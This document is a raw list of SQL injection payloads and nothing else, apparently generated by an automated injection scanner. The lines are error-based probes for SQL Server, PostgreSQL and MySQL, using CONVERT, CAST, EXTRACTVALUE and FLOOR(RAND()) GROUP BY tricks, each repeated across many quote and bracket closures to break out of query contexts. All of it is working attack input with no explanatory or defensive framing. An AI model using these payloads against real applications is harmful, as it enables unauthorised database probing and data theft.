wYxD" AND 3271=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3271=3271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND "XKhf"="XKhf
wYxD") AND 3271=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3271=3271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND ("mcyG"="mcyG
wYxD' AND 3271=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3271=3271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND 'gzXN' LIKE 'gzXN
wYxD%' AND 3271=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3271=3271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND 'txHp%'='txHp
wYxD') AND 3271=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3271=3271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND ('ciFn' LIKE 'ciFn
wYxD' AND 3271=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3271=3271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND 'rLfc'='rLfc
wYxD')) AND 3271=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3271=3271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND (('ZBnI'='ZBnI
wYxD') AND 3271=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3271=3271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND ('FXQq'='FXQq
-1410 OR 7300 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7300=7300) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)))-- DQMQ
-4658 OR 7300 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7300=7300) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)))
-1949)) OR 7300 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7300=7300) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND ((5137=5137
-7697) OR 7300 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7300=7300) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND (9454=9454
-4501" OR 7300 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7300=7300) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND "ztdl"="ztdl
-9612") OR 7300 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7300=7300) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND ("ULAA"="ULAA
-2456' OR 7300 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7300=7300) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND 'htNZ' LIKE 'htNZ
-3082%' OR 7300 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7300=7300) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND 'TfVA%'='TfVA
-6689') OR 7300 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7300=7300) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND ('QTPC' LIKE 'QTPC
-3174' OR 7300 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7300=7300) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND 'NRDf'='NRDf
-4098')) OR 7300 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7300=7300) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND (('ZqeK'='ZqeK
-8978') OR 7300 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7300=7300) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND ('IkXk'='IkXk
wYxD AND 2668 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2668=2668) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)))-- bxEz
wYxD AND 2668 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2668=2668) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113)))
wYxD)) AND 2668 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2668=2668) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND ((3461=3461
wYxD) AND 2668 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2668=2668) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND (7699=7699
wYxD" AND 2668 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2668=2668) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND "IOsa"="IOsa
wYxD") AND 2668 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2668=2668) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND ("MaMs"="MaMs
wYxD' AND 2668 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2668=2668) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND 'UEtb' LIKE 'UEtb
wYxD%' AND 2668 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2668=2668) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND 'UKRO%'='UKRO
wYxD') AND 2668 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2668=2668) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND ('SQxu' LIKE 'SQxu
wYxD' AND 2668 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2668=2668) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND 'tTYN'='tTYN
wYxD')) AND 2668 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2668=2668) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND (('oRGJ'='oRGJ
wYxD') AND 2668 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2668=2668) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(122)+CHAR(113))) AND ('NguQ'='NguQ
-9629 OR 5450=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5450=5450) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC)-- qTfJ
-2710 OR 5450=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5450=5450) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC)
-9614)) OR 5450=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5450=5450) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND ((8896=8896
-5724) OR 5450=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5450=5450) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND (9526=9526
-4829" OR 5450=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5450=5450) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND "JLgi"="JLgi
-8128") OR 5450=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5450=5450) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND ("fqZL"="fqZL
-5431' OR 5450=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5450=5450) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND 'ReZC' LIKE 'ReZC
-2039%' OR 5450=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5450=5450) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND 'tRfJ%'='tRfJ
-3386') OR 5450=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5450=5450) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND ('EOxC' LIKE 'EOxC
-5834' OR 5450=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5450=5450) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND 'hLQi'='hLQi
-1522')) OR 5450=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5450=5450) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND (('VDTY'='VDTY
-2068') OR 5450=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5450=5450) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND ('SDDg'='SDDg
wYxD AND 6782=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6782=6782) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC)-- QhFh
wYxD AND 6782=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6782=6782) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC)
wYxD)) AND 6782=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6782=6782) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND ((9436=9436
wYxD) AND 6782=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6782=6782) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND (1485=1485
wYxD" AND 6782=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6782=6782) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND "adiA"="adiA
wYxD") AND 6782=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6782=6782) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND ("HEHw"="HEHw
wYxD' AND 6782=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6782=6782) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND 'eXSd' LIKE 'eXSd
wYxD%' AND 6782=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6782=6782) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND 'XzRL%'='XzRL
wYxD') AND 6782=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6782=6782) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND ('ctnY' LIKE 'ctnY
wYxD' AND 6782=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6782=6782) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND 'tObk'='tObk
wYxD')) AND 6782=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6782=6782) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND (('bmfr'='bmfr
wYxD') AND 6782=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6782=6782) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)) AS NUMERIC) AND ('mGef'='mGef
wYxD OR ROW(1058,7585)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(1058=1058,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 5199 UNION SELECT 1508 UNION SELECT 8150 UNION SELECT 3492)a GROUP BY x)-- qLio
wYxD OR ROW(1058,7585)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(1058=1058,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 5199 UNION SELECT 1508 UNION SELECT 8150 UNION SELECT 3492)a GROUP BY x)
wYxD)) OR ROW(1058,7585)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(1058=1058,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 5199 UNION SELECT 1508 UNION SELECT 8150 UNION SELECT 3492)a GROUP BY x) AND ((1620=1620
wYxD) OR ROW(1058,7585)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(1058=1058,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 5199 UNION SELECT 1508 UNION SELECT 8150 UNION SELECT 3492)a GROUP BY x) AND (9390=9390
wYxD" OR ROW(1058,7585)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(1058=1058,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 5199 UNION SELECT 1508 UNION SELECT 8150 UNION SELECT 3492)a GROUP BY x) AND "Jdju"="Jdju
wYxD") OR ROW(1058,7585)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(1058=1058,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 5199 UNION SELECT 1508 UNION SELECT 8150 UNION SELECT 3492)a GROUP BY x) AND ("cmDF"="cmDF
wYxD' OR ROW(1058,7585)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(1058=1058,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 5199 UNION SELECT 1508 UNION SELECT 8150 UNION SELECT 3492)a GROUP BY x) AND 'MyJD' LIKE 'MyJD
wYxD%' OR ROW(1058,7585)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(1058=1058,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 5199 UNION SELECT 1508 UNION SELECT 8150 UNION SELECT 3492)a GROUP BY x) AND 'xAzC%'='xAzC
wYxD') OR ROW(1058,7585)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(1058=1058,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 5199 UNION SELECT 1508 UNION SELECT 8150 UNION SELECT 3492)a GROUP BY x) AND ('oUsJ' LIKE 'oUsJ
wYxD' OR ROW(1058,7585)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(1058=1058,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 5199 UNION SELECT 1508 UNION SELECT 8150 UNION SELECT 3492)a GROUP BY x) AND 'oLKb'='oLKb
wYxD')) OR ROW(1058,7585)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(1058=1058,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 5199 UNION SELECT 1508 UNION SELECT 8150 UNION SELECT 3492)a GROUP BY x) AND (('wSXJ'='wSXJ
wYxD') OR ROW(1058,7585)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(1058=1058,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 5199 UNION SELECT 1508 UNION SELECT 8150 UNION SELECT 3492)a GROUP BY x) AND ('acnv'='acnv
wYxD AND ROW(3016,4776)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3016=3016,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 7378 UNION SELECT 1746 UNION SELECT 7298 UNION SELECT 5279)a GROUP BY x)-- tGVg
wYxD AND ROW(3016,4776)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3016=3016,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 7378 UNION SELECT 1746 UNION SELECT 7298 UNION SELECT 5279)a GROUP BY x)
wYxD)) AND ROW(3016,4776)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3016=3016,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 7378 UNION SELECT 1746 UNION SELECT 7298 UNION SELECT 5279)a GROUP BY x) AND ((5924=5924
wYxD) AND ROW(3016,4776)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3016=3016,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 7378 UNION SELECT 1746 UNION SELECT 7298 UNION SELECT 5279)a GROUP BY x) AND (7855=7855
wYxD" AND ROW(3016,4776)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3016=3016,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 7378 UNION SELECT 1746 UNION SELECT 7298 UNION SELECT 5279)a GROUP BY x) AND "OWaP"="OWaP
wYxD") AND ROW(3016,4776)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3016=3016,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 7378 UNION SELECT 1746 UNION SELECT 7298 UNION SELECT 5279)a GROUP BY x) AND ("lWRK"="lWRK
wYxD' AND ROW(3016,4776)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3016=3016,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 7378 UNION SELECT 1746 UNION SELECT 7298 UNION SELECT 5279)a GROUP BY x) AND 'SiRo' LIKE 'SiRo
wYxD%' AND ROW(3016,4776)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3016=3016,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 7378 UNION SELECT 1746 UNION SELECT 7298 UNION SELECT 5279)a GROUP BY x) AND 'XdkF%'='XdkF
wYxD') AND ROW(3016,4776)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3016=3016,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 7378 UNION SELECT 1746 UNION SELECT 7298 UNION SELECT 5279)a GROUP BY x) AND ('OTzs' LIKE 'OTzs
wYxD' AND ROW(3016,4776)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3016=3016,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 7378 UNION SELECT 1746 UNION SELECT 7298 UNION SELECT 5279)a GROUP BY x) AND 'ZIND'='ZIND
wYxD')) AND ROW(3016,4776)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3016=3016,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 7378 UNION SELECT 1746 UNION SELECT 7298 UNION SELECT 5279)a GROUP BY x) AND (('jxBl'='jxBl
wYxD') AND ROW(3016,4776)>(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3016=3016,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM (SELECT 7378 UNION SELECT 1746 UNION SELECT 7298 UNION SELECT 5279)a GROUP BY x) AND ('KSoi'='KSoi
wYxD OR EXTRACTVALUE(8487,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8487=8487,1))),0x716a717a71))-- kHrv
wYxD OR EXTRACTVALUE(8487,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8487=8487,1))),0x716a717a71))
wYxD)) OR EXTRACTVALUE(8487,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8487=8487,1))),0x716a717a71)) AND ((4913=4913
wYxD) OR EXTRACTVALUE(8487,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8487=8487,1))),0x716a717a71)) AND (8153=8153
wYxD" OR EXTRACTVALUE(8487,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8487=8487,1))),0x716a717a71)) AND "JWDp"="JWDp
wYxD") OR EXTRACTVALUE(8487,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8487=8487,1))),0x716a717a71)) AND ("mqqp"="mqqp
wYxD' OR EXTRACTVALUE(8487,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8487=8487,1))),0x716a717a71)) AND 'qSVs' LIKE 'qSVs
wYxD%' OR EXTRACTVALUE(8487,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8487=8487,1))),0x716a717a71)) AND 'LiSe%'='LiSe
wYxD') OR EXTRACTVALUE(8487,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8487=8487,1))),0x716a717a71)) AND ('Ibru' LIKE 'Ibru
wYxD' OR EXTRACTVALUE(8487,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8487=8487,1))),0x716a717a71)) AND 'nfeC'='nfeC
wYxD')) OR EXTRACTVALUE(8487,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8487=8487,1))),0x716a717a71)) AND (('wych'='wych
wYxD') OR EXTRACTVALUE(8487,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8487=8487,1))),0x716a717a71)) AND ('dxjB'='dxjB
wYxD AND EXTRACTVALUE(8189,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8189=8189,1))),0x716a717a71))-- oAVO
wYxD AND EXTRACTVALUE(8189,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8189=8189,1))),0x716a717a71))
wYxD)) AND EXTRACTVALUE(8189,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8189=8189,1))),0x716a717a71)) AND ((8064=8064
wYxD) AND EXTRACTVALUE(8189,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8189=8189,1))),0x716a717a71)) AND (2501=2501
wYxD" AND EXTRACTVALUE(8189,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8189=8189,1))),0x716a717a71)) AND "LTIC"="LTIC
wYxD") AND EXTRACTVALUE(8189,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8189=8189,1))),0x716a717a71)) AND ("kHVx"="kHVx
wYxD' AND EXTRACTVALUE(8189,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8189=8189,1))),0x716a717a71)) AND 'rFWe' LIKE 'rFWe
wYxD%' AND EXTRACTVALUE(8189,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8189=8189,1))),0x716a717a71)) AND 'TnIo%'='TnIo
wYxD') AND EXTRACTVALUE(8189,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8189=8189,1))),0x716a717a71)) AND ('nQzt' LIKE 'nQzt
wYxD' AND EXTRACTVALUE(8189,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8189=8189,1))),0x716a717a71)) AND 'HfcB'='HfcB
wYxD')) AND EXTRACTVALUE(8189,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8189=8189,1))),0x716a717a71)) AND (('zeUa'='zeUa
wYxD') AND EXTRACTVALUE(8189,CONCAT(0x5c,0x7170787871,(SELECT (ELT(8189=8189,1))),0x716a717a71)) AND ('cwxV'='cwxV
wYxD OR (SELECT 2762 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(2762=2762,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Fztj
wYxD)) OR (SELECT 2762 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(2762=2762,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((8622=8622
wYxD) OR (SELECT 2762 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(2762=2762,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (8924=8924
wYxD") OR (SELECT 2762 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(2762=2762,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("TSfG"="TSfG
wYxD' OR (SELECT 2762 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(2762=2762,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tWzL' LIKE 'tWzL
wYxD') OR (SELECT 2762 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(2762=2762,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('Uftj' LIKE 'Uftj
